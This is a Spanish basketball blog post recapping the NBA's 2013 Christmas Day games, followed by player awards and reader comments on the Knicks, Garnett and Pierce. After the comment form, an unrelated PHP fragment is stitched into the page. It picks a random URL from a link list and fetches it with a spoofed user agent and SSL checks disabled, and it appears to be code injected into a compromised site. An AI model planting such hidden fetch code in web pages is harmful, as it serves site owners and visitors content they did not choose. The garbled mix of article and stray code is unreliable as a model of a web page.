La Crónica: Día de Navidad

26 de December de 2013 por txusma

Día de Navidad en la NBA. Una de esas fechas que la liga se guarda para enseñar al mundo lo mejor de sí, poner en el escaparate a sus mejores equipos y enfrentarlos entre ellos. Este año el rendimiento de algunos equipos no está siendo el esperado, lo que provocó que alguno de los partidos fueran algo descafeinados pero cómo siempre el espectáculo estuvo asegurado.

El primer partido de la jornada parecía uno de los más interesantes cuando se anunció la jornada de Navidad allá por el mes de octubre. Además el partido era a las 18:00 en España, lo que todavía lo hacía más atractivo pero todos sabemos cómo les está yendo a Chicago Bulls y Brooklyn Nets este año por lo que el duelo hace mucho tiempo que pasó a un segundo plano. No obstante, ambos equipos siguen compartiendo mismo objetivo aunque este haya de pasado de intentar ganar a la conferencia a meterse en playoffs. Al menos esperábamos un partido igualado. Nada más lejos de la realidad aunque la primera mitad se mantuvo igualada en cuanto a errores e imprecisiones y apenas Taj Gibson, que jugaba ante su gente, sostenía a los Bulls. En la segunda parte la tónica cambió y los Bulls comenzaron a aprovechar sus oportunidades tras las constantes pérdidas de Brooklyn lo que marcó la diferencia. Los Bulls consiguieron una amplia ventaja en el tercer cuarto que dejaba el partido visto para sentencia. Cómo marcan las reglas, el último cuarto se tuvo que disputar pero ya nada ni nadie hizo nada por cambiar el resultado final por lo que Chicago se llevó el gato al agua con más facilidad de lo previsto (95-78). 

El segundo partido de la jornada era el más desigualado de la misma y las expectativas se cumplieron al 100%. La baja de Carmelo Anthony acrecentó aún más la desigualdad del choque. Por el marcador puede parecer que vimos una actuación sideral de Oklahoma City Thunder pero no fue así. Los Thunder se dedicaron a jugar con tranquilidad y sin forzar la máquina y simplemente la diferencia de nivel entre ambos equipos hizo el resto. En el segundo cuarto a pesar de que las ventajas no eran aún excesivas todos nos dimos cuenta de que el partido ya había finalizado (123-94). Victoria para Oklahoma que empata el récord de Indiana y Portland liderando la liga.

A las 11 de la noche en España comenzaba la visita de Miami Heat al Staples Center para enfrentarse a los Lakers.  Vistos los dos partidos que le precedían y el nivel de ambos equipos, las expectativas pasaban por poder asistir a un partido parejo hasta el final del encuentro. Al menos en este caso las expectativas se cumplieron y los Lakers se mantuvieron en el encuentro hasta los últimos minutos en los que los Heat hicieron valer su mayor calidad (101-95). Con esta victoria los Heat se mantienen invictos el día de Navidad contra los Lakers.

La penúltima parada de la noche era el duelo tejano entre Houston Rockets y San Antonio Spurs. Los Rockets, con un primer cuarto brutal en el que consiguieron 40 puntos, pusieron las bases para lo que finalmente sería una meritoria victoria como visitante ante uno de los mejores equipos de la competición. Con la ventaja lograda en el primer cuarto, Rockets marchó siempre con el marcador a favor y a pesar de que por momentos el buen hacer de los de Popovich los acercaba en el marcador, Harden y Howard se encargaban de devolver la tranquilidad a los suyos. Con esta victoria Houston recupera el quinto puesto de la conferencia (111-98).

El último partido de la jornada fue el colofón ideal para este día de Navidad. Toda la emoción que no tuvimos en los primeros duelos de la jornada se concentró en este. El duelo Chris Paul vs Stephen Curry no decepcionó e hizo las delicias de los que aguantaron hasta las 4:30 de la madrugada para verlos en acción. Los dos primeros cuartos fueron uno para cada equipo pero en la segunda parte el duelo de ventajas y remontadas se difuminó y el intercambio de golpes fue una constante, ningún equipo conseguía una ventaja mínimamente importante. Recién comenzado el último cuarto una tangana protagonizada por Andrew Bogut y Blake Griffin terminó con el de los Clippers expulsado tras recibir su segunda técnica  (ya tenía una por un enfrentamiento anterior con Draymond Green). En los últimos minutos ambos bases cogieron la responsabilidad e intercambiaron canastas para adelantar a sus equipos en la constante alternancia en el marcador. A falta de 15 segundos Chris Paul falló una bandeja aparentemente sencilla que hubiera igualado el duelo. El rebote se lo llevó Iguodala que no pudo encestar ninguno de los tiros libres de los que dispuso dando opciones de nuevo a los Clippers. En la última jugada tras estar a punto de perder la bola Chris Paul consiguió abrirse camino hasta el aro pero Klay Thompson llegando por detrás evito la canasta con un tapón. Con apenas un segundo por jugarse Jamal Crawford tuvo que tirar un triple a la desesperada que no entró y la victoria se quedó en el Oracle Arena (103-105). Al final del partido le tensión explotó y los jugadores de ambos equipos tuvieron que ser separados camino de los vestuarios. Una batalla en toda regla.

PREMIOS

MVP: 29 puntos, 7 rebotes, 6 asistencias y 2 robos en apenas 32 minutos. Kevin Durant ni pisó la cancha en el último cuarto. Su ex-compañero, James Harden, prácticamente calcó esos números pero necesitó 10 minutos más para conseguirlo.

Rookie: Sin Carmelo en pista Tim Hardaway Jr. asumió mucho más protagonismo. Acabó el partido con 21 puntos, 5 rebotes y 2 asistencias.

Sorpresa: Terrence Jones parece haberse asentado ya como titular indiscutible en los Rockets. Actuaciones como las de ayer (21 puntos, 14 rebotes y 3 tapones) ante los Spurs lo confirman.

Decepción: Mal día para Tony Parker. Se quedó en 6 puntos con un 3 de 11 en TC y no pudo marcar diferencias en ningún momento.

Esfuerzo en vano: Chris Paul fue el mejor de los Clippers con 26 puntos y 11 asistencias pero un tapón de Klay Thompson en el último segundo les condenó a la derrota.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Denise dice:
    #1

    ¿No creeis que dos leyendas de los últimos 15 años como Garnett y Pierce deberían retirarse este año y dejar de arrastrarse por las canchas? Con lo que han sido estos tios y ahora son humillados en cada encuentro.

      Citar

  2. txusma dice:
    #2

    En el anterior post Ruxixón comentaba que la gerencia de la Knicks no hacen movimientos. Yo me pregunto qué podrían hacer (de hecho, me lo pregunto de varios equipos. Se huele un artículo). Sin rondas, sin jugadores valiosos para traspasar, con contratos tóxicos (Amare pero tb JR Smith), con la estrella a punto de largarse… MAl futuro para la franquicia de la gran manzana.

      Citar

  3. Esteban dice:
    #3

    Denise:
    ¿No creeis que dos leyendas de los últimos 15 años como Garnett y Pierce deberían retirarse este año y dejar de arrastrarse por las canchas? Con lo que han sido estos tios y ahora son humillados en cada encuentro.

    el problema con ellos es que aun cobran sueldos enormes

    ambos jugadores, para muchos equipos, cobrandoi la excepcion de nivel medio o incluso el minimo serian de suma importancia, pero hoy, con esos contratos, son mas un problema q una solucion

      Citar

  4. Denise dice:
    #4

    Esteban: el problema con ellos es que aun cobran sueldos enormes

    ambos jugadores, para muchos equipos, cobrandoi la excepcion de nivel medio o incluso el minimo serian de suma importancia, pero hoy, con esos contratos, son mas un problema q una solucion

    Pero el contrato da igual, debería salir de ellos mismos el tener un poco de dignidad y largarse. Los tios que van a ser Hall of Fame y van a tener las camisetas retiradas deben saber retirarse a tiempo, no humillarse a si mismo en las canchas por unos cuantos billetes mas y que la gente recuerde esta parte de ello.

      Citar

  5. Ruxixón dice:
    #5

    ¿Es la segunda vez que ganan los Rockets como visitantes a los Spurs?Ojo al dato que pocos equipos podrán decir a final de temporada que le ganan 2 partidos a los de Popo.

    Todo lo bueno que tiene Chris Paul de bueno lo tiene de estúpido (en la cancha).Y también el status que tiene repercute en el respeto por parte de los árbitros porque en la jugada que le tapona Klay Thompson era merecedora de una técnica y se acaba ahí el partido,sin dar oportunidad a la heroica.Pero vamos,se marcó unos ultimos 2 minutos de niño de preescolar.

    txusma:
    En el anterior post Ruxixón comentaba que la gerencia de la Knicks no hacen movimientos. Yo me pregunto qué podrían hacer (de hecho, me lo pregunto de varios equipos. Se huele un artículo). Sin rondas, sin jugadores valiosos para traspasar, con contratos tóxicos (Amare pero tb JR Smith), con la estrella a punto de largarse… MAl futuro para la franquicia de la gran manzana.

    Woodson no es la solución a todos los males pero no pinta nada en ese banquillo,eso lo primero.Después si alguien te da alguna ronda,algún joven y se come el contrato de JR yo me desprendería de Melo,por más que sea el único motivo de alegría para los Knicks…aún así la opción lógica (antiDolan) es la que te lleva a sufrir un año y medio más la situación actual,esperar a que expiren los contratos que tienes y acometer con paciencia la reconstrucción de la franquicia teniendo de su parte el encanto que puede tener New York (ciudad y publicidad,no el equipo) para los jugadores.Una vía que te lleva a que el equipo,con un nivel del este mayor -lo que entraría dentro de lo razonable- ,no pise playoff en un lustro.

      Citar

  6. Denise dice:
    #6

    Se habla del interés de Rondo ahora para los Knicks

      Citar

  7. Esteban dice:
    #7

    Denise:
    Se habla del interés de Rondo ahora para los Knicks

    rondo a los knicks? a cambio de quien? melo y chandler supongo, no creo q nueva yonrk pueda ofrecer otra cosa para hacerse con rondo

      Citar

  8. Big Ben dice:
    #8

    Para mi la sorpresa fue que Amar’e metiera 22 puntos ! casualidad que no estubo Carmelo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>